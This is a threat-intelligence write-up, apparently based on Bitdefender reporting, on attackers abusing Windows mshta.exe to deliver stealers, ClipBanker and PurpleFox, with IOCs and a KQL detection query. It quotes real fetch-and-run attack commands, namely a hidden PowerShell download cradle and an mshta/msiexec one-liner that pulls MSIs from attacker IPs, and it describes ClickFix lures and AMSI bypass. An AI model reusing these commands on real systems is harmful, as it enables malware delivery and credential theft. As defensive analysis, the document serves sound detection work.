MSHTA: The Retired Windows Tool Still Running Malware
Executive Summary
A Windows utility most people assume died with Internet Explorer is quietly
powering live malware campaigns. Bitdefender reports that since the start of
2026, detections of mshta.exe — the Microsoft HTML Application Host — have
risen sharply, and because legitimate use of the tool is fading, that trend
reflects malicious abuse, not renewed admin adoption.
The appeal is simple: MSHTA is Microsoft-signed, present by default, and runs VBScript/JavaScript in memory, letting attackers pull remote payloads and hand off to PowerShell or msiexec while leaving almost nothing on disk. Bitdefender observed it across the full threat spectrum — commodity stealers (LummaStealer, Amatera via CountLoader and Emmenhtal Loader), crypto-clipboard malware (ClipBanker), and the long-lived, rootkit-enabled PurpleFox.
For an enterprise, the business risk is that a single click on a fake "free software" download or a fake CAPTCHA prompt can launch a trusted, signed binary that ends in credential theft, financial fraud, or persistent compromise — with signature-based controls none the wiser.
The single most important action: restrict or block mshta.exe (and
wscript.exe) where they are not needed, and alert on mshta.exe command lines
that contain a URL or spawn PowerShell/msiexec.
Background — Why MSHTA Is an Attractive LOLBIN
mshta.exe runs HTML Applications (.hta) — programs written in HTML plus
VBScript or JavaScript — using the legacy Internet Explorer rendering engine.
Although IE reached end of support on 15 June 2022, the engine survives in Edge's
IE mode (supported at least until 2029), and MSHTA itself ships enabled by
default on current Windows.
Living-off-the-Land binaries (LOLBINs) are attractive precisely because they are signed, familiar, and implicitly trusted. MSHTA fits the model cleanly: it can execute script content in-memory, retrieve content from remote locations, and run under a legitimate Microsoft-signed process — ideal for stagers and loaders that want to minimize on-disk artifacts.
A note on direction of travel: Microsoft began deprecating VBScript in the second half of 2024 (now a Feature on Demand, still enabled by default), plans to disable it by default in 2027, and intends to remove it eventually. There is, however, no public plan to remove MSHTA. As long as it ships by default, it remains both a residual admin tool and exposed attack surface.
Roughly 10% of Bitdefender's MSHTA telemetry is still benign — one-liner
javascript:alert() / vbscript:msgbox() admin notifications and simple login
scripts. That residual legitimate use is exactly what makes blunt blocking risky
and behavioral detection necessary.
Campaign Roundup — How MSHTA Gets Abused
Across campaigns, MSHTA plays the same role: a built-in, signed utility that fetches and executes remote script content at the initial or intermediate stage, then hands off to PowerShell, WScript, msiexec, or a final payload.
1. CountLoader → LummaStealer / Amatera
The largest cluster in Bitdefender's telemetry used CountLoader, an HTA-based
loader delivering the stealers LummaStealer and Amatera. Most detections
showed mshta.exe command lines pointing at domains that imitate legitimate
services on the .cc TLD (e.g. google-services[.]cc,
memory-scanner[.]cc). The campaign gained traction in late 2025, peaked at
the end of January 2026, then declined as operators shifted hosting; from late
February 2026 a new pattern moved to .vg/.gl domains
(explorer[.]vg, ccleaner[.]gl, microservice[.]gl).
The lure is cracked/free software pushed via messages, social posts, or
SEO-poisoned sites. The downloaded archive ships a Setup.exe that is actually a
legitimate Python interpreter, alongside genuine python3XX.dll files. At
runtime, dependency resolution pulls in a malicious script at
.\Lib\encodings\aliases.py, which launches a renamed MSHTA (iso2022.exe)
to contact C2 and retrieve the HTA loader. The resulting command line resembles:
cd Lib\encodings && iso2022.exe https:\\planetitude[.]org/wp-admin/chellenge/stats.location & iso2022[.]exe https:\\alpha-centavr[.]cc
2. Emmenhtal Loader (ClickFix)
The Emmenhtal Loader chain leans on ClickFix social engineering. It
begins with Discord phishing links to fake human-verification pages
(reCAPTCHA-style, on hosts like humancheck[.]shop). JavaScript silently copies
a malicious command to the clipboard; the user is told to press Win + R,
Ctrl + V, Enter — so explorer.exe launches mshta.exe against a remote
".mp4" that is really an HTA.
flowchart TD
A["Discord phishing link"] --> B["Fake reCAPTCHA page<br/>(humancheck[.]shop)"]
B -->|JS copies cmd to clipboard| C["User: Win+R → Ctrl+V → Enter"]
C --> D["explorer.exe → mshta.exe<br/>remote .mp4 = HTA (in-memory)"]
D -->|1x1px, hidden window| E["JS Base64 decoder → eval"]
E --> F["WScript.Shell runs PowerShell<br/>-w hidden -ep bypass"]
F --> G["AMSI bypass (patch clr.dll)<br/>+ load .NET assembly"]
G --> H["LummaStealer"]
The HTA is bloated with garbage data, sets its window to 1×1 pixel / hidden,
and is executed directly in memory (never written to disk). An embedded
Base64 routine decodes and evals a second-stage loader, which spawns a
WScript.Shell and runs a hidden PowerShell one-liner that downloads and
executes a script in memory:
powershell -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('hxxps://klipdiheqoe[.]shop/ruwkl[.]png'))"
The final PowerShell performs an AMSI bypass (patching clr.dll, lifted from
a public GitHub repo), then Base64-decodes and reflectively loads a .NET assembly
— in the analyzed case, a known LummaStealer assembly
(1E0E375F...85B7C84).
3. ClipBanker
Here MSHTA fetches a remote HTA (e.g. asd.s7610rir[.]pw/win/checking[.]hta) that
hides its window off-screen (moveTo -2000,-2000), creates a WScript.Shell,
and runs a Base64 PowerShell command. That stage pulls checking.ps1
(333E2192...), which sets Windows Defender exclusions and persistence via a
scheduled task masquerading as a legitimate service (e.g. "Optimize Start
Menu Cache Files-S-3-5-21-…"), then drops the ClipBanker downloader
(ichigo-lite.ps1). A cleanup script (del.ps1) removes traces and kills
analysis tools like Procmon and Autoruns. ClipBanker's goal: swap
cryptocurrency wallet addresses in the victim's clipboard.
4. PowerShell-via-MSHTA obfuscation variants
Smaller clusters use MSHTA purely to spawn obfuscated PowerShell, with per-campaign tricks to dodge EDR/SIEM keyword alerts:
- XWorm / Danabot — URL looks like an image (
.jpg) but is PowerShell run in-memory; PowerShell keywords are split into tokens ((New-Object Net.We+bClient).Downlo…) or padded with junk characters removed viaString.Replace. - Lalala stealer — the script is only served if the
POSTrequest includes a predefined password (iwr ... -method post -body <password>).
5. PurpleFox — even advanced threats use MSHTA
PurpleFox (active since 2018, still live in 2026) is a rootkit-enabled
backdoor. One delivery method has stayed consistent: launch msiexec from an
MSHTA command line to download and run an MSI disguised as a .png:
mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (195[.]189[.]28[.]244:17807 103[.]124[.]106[.]194:18413 58[.]221[.]59[.]20:17256 ) do Msiexec /i http://%i/3EBCE3A4.Png /Q",0)(window.close)
flowchart LR
A["mshta.exe (vbscript:)"] --> B["msiexec /i http://IP/file.Png /Q"]
B --> C["MSI (disguised .png)<br/>rootkit-enabled backdoor"]
C --> D["Persistence + C2 commands<br/>info theft · surveillance · DDoS"]
C --> E["Worm: scan port 445<br/>SMB brute-force"]
E -->|infect| F["New Windows hosts"]
F --> E
Once installed, PurpleFox provides persistence and on-demand C2 execution, and supports info theft, surveillance, and DDoS. Its worm side (Guardicore, 2021) propagates by scanning port 445 and brute-forcing SMB — a campaign that saw a ~600% spike in May 2020 (≈90,000 attacks) and abused compromised, outdated IIS servers to host its payloads. The rootkit hides files and registry keys, and the malware blocks ports 445/139/135 to prevent reinfection.
Not always malicious
Not every MSHTA execution is an attack. A meaningful share of detections came
from DriverPack, whose updater uses a scheduled task to run an in-memory HTA
to check for updates. It is not inherently malicious (though some components are
flagged PUA) — a useful reminder to tune for behavior, not for mshta.exe alone.
MITRE ATT&CK Mapping
Analyst mapping derived from the reporting; not an official vendor layer.
| Tactic | Technique | ID |
|---|---|---|
| Defense Evasion | System Binary Proxy Execution: Mshta | T1218.005 |
| Defense Evasion | System Binary Proxy Execution: Msiexec | T1218.007 |
| Execution | Command & Scripting: PowerShell | T1059.001 |
| Execution | Command & Scripting: Visual Basic | T1059.005 |
| Execution | Command & Scripting: JavaScript | T1059.007 |
| Initial Access | Phishing | T1566 |
| Execution | User Execution (incl. ClickFix paste-run) | T1204 |
| Command & Control | Ingress Tool Transfer | T1105 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Defense Evasion | Deobfuscate/Decode Files or Information | T1140 |
| Defense Evasion | Reflective Code Loading | T1620 |
| Defense Evasion | Impair Defenses (AMSI bypass, Defender exclusions) | T1562.001 |
| Persistence | Scheduled Task/Job | T1053.005 |
| Defense Evasion | Rootkit | T1014 |
| Collection | Clipboard Data (ClipBanker) | T1115 |
| Lateral Movement | Remote Services: SMB (PurpleFox worm) | T1021.002 |
| Credential Access | Brute Force (SMB) | T1110 |
| Defense Evasion | Indicator Removal (cleanup script) | T1070 |
Selected IOCs
Selected for readability — the full IOC set is in the Bitdefender report (see References).
# === Hashes (SHA-256) ===
1E0E375F3EE82D5AF5DFE6F7DF0E2FAC9A7D37C67ADD3390D05A93AFD85B7C84 LummaStealer payload (Emmenhtal)
333E2192F2551415659FB4094E81B911708921BB588EECF65E27F51C9938DFC2 ClipBanker checking.ps1
38FE562136ADE372FC4CEDDE67826AEEA8404E93A54A4A4736DDB4C8C8D4C96D ClipBanker ichigo-lite.ps1
7D0487AFC91B0FE8B2FBF732AB54C3C07E86BF69471BBA6C283AABEA190499BA ClipBanker del.ps1 (cleanup)
# === CountLoader / LummaStealer domains (representative) ===
google-services[.]cc · memory-scanner[.]cc · alpha-centavr[.]cc
explorer[.]vg · ccleaner[.]gl · microservice[.]gl (newer .vg/.gl pattern)
# === Emmenhtal URLs (representative) ===
hxxps[://]buck2nd[.]oss-eu-central-1[.]aliyuncs[.]com/dir/sixth/singl6[.]mp4
hxxp[://]92[.]255[.]57[.]155/Capcha[.]html
hxxps[://]klipdiheqoe[.]shop/ruwkl[.]png (PowerShell stage)
# === ClipBanker ===
185[.]208[.]159[.]199 hosts checking.ps1
87[.]96[.]21[.]84 hosts follow-on payloads
hxxps[://]asd[.]s7610rir[.]pw/win/checking[.]hta
# === PurpleFox .msi hosts (representative) ===
195[.]189[.]28[.]244 · 103[.]124[.]106[.]194 · 58[.]221[.]59[.]20
89[.]117[.]2[.]159 · 107[.]175[.]187[.]11
# === Host-based patterns ===
iso2022.exe renamed mshta.exe (CountLoader)
mshta.exe spawning powershell.exe / msiexec.exe / wscript.exe
mshta.exe command line containing http(s):// or vbscript:/javascript:
parent explorer.exe → mshta.exe (ClickFix paste-and-run)
Scheduled task names imitating Windows services
Detection for SOC
The reliable signal is not a single file but the command-line shape and
process lineage of mshta.exe. Starting point (Microsoft Sentinel / Defender
KQL):
DeviceProcessEvents
| where FileName =~ "mshta.exe"
| where ProcessCommandLine has_any ("http://", "https://", "vbscript:", "javascript:")
or InitiatingProcessFileName =~ "explorer.exe" // ClickFix paste-and-run
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, ProcessCommandLine
Pair it with a lineage hunt for mshta.exe spawning powershell.exe,
msiexec.exe, or wscript.exe, and flag any renamed MSHTA (a binary other
than mshta.exe whose original filename / signature resolves to the MS HTML
Application Host).
Recommendations (concise)
- Block or restrict
mshta.exeandwscript.exewhere not needed for business workflows; block.htaexecution via Group Policy / application control (WDAC / AppLocker). - Enable ASR rules and behavioral (not signature-only) detection; alert on the command-line and lineage patterns above.
- User awareness on ClickFix — never paste-and-run commands from a "human verification" prompt (Win+R lure); avoid cracked/"free" software downloads.
- Migrate legacy admin scripts off MSHTA/VBScript ahead of the 2027 VBScript default-off change.
